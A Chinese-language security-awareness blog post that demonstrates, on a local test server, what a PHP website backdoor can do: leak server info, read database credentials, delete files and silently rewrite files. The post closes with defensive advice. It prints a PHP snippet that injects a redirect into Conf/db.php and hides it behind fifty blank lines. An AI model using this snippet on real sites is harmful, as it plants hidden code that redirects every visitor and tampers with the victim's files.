黑客可以利用网站的后门做什么？

说明：

写代码的人需要特别注意安全问题，绝不能轻信用户的输入。

测试准备：

为了模拟攻击，我在本地搭建了一个服务器环境，展示了一个正常的网站如何被攻击。

首先，我修改了电脑本地的 host 文件，这样就可以通过 test.com 虚拟域名访问本地文件了。host 文件的路径在“ C:\Windows\System32\drivers\etc ”。

网站目录非常简单，如下所示：

在网站的入口文件中，我引用了数据库配置文件，并输出了一句话来模拟网站首页。

在数据库配置文件中，我参考了当前流行的框架ThinkPHP的数据库配置文件，返回了一个包含数据库端口和密码等基本信息的数组。

接下来是我们的重点，黑客后门文件。

也许你会觉得，就这些代码能做什么呢？

开始模拟攻击：

我们先访问一下我们的网站，发现可以正常访问，没有任何问题。

然后访问一下黑客文件，也好像没有问题。

1、输出PHP版本信息：

现在黑客已经知道了你的后台 PHP 版本，以及安装了哪些插件，使用的是哪种数据库。

2、网页重定向：

可以跳转到百度了，这表示黑客已经搭建好了一个可以运行代码的环境。现在通过你的网站，黑客可以随意执行任意一行代码。

3、读取数据库配置信息：

黑客已经获取到了你的密码等信息，你的网站上的数据都可以被修改了，这是不是让你害怕呢？甚至可以“删库跑路”！！

4、删除文件：

看，1.txt 文件已经被删除了。黑客可以删除你网站上的任意文件。

5、修改文件

?config=
// 读取数据库配置文件
$info=file_get_contents("Conf/db.php");
// 设置很多个换行符号
$change=str_repeat("\r\n",50);
// 用空格代替<？php 
$file= str_replace("<?php","",$info);
// 你想添加的任何功能都可以写在下面
$extCode="header('location:http://www.baidu.com');";
...

// 最后组合起来，保存回去
file_put_contents("Conf/db.php","<?php".$change.$extCode.$file);

来看看你的 db.php 文件是如何被修改的

在文件头部添加了大量的换行符，你可能会认为文件是空的，但实际上他已经在文件中插入了一行跳转代码，无论其他人如何访问你的网站，都会被重定向到他所指定的网站。

攻击 End

看完是不是大吃一惊？别慌：我们应该如何防范呢？

不要相信用户的输入！不要相信用户的输入！不要相信用户的输入！
在获取用户输入之前一定要进行过滤处理；
在服务器上，设置文件的权限，不要给每个文件都赋予执行脚本的权限；
可以增加防篡改功能；
或者修改你服务器的安全组，修改默认端口如 22、21 等，不要开放所有端口；
对整个站点进行木马扫描。

转载请注明：汇站网 » 黑客可以利用网站的后门做什么？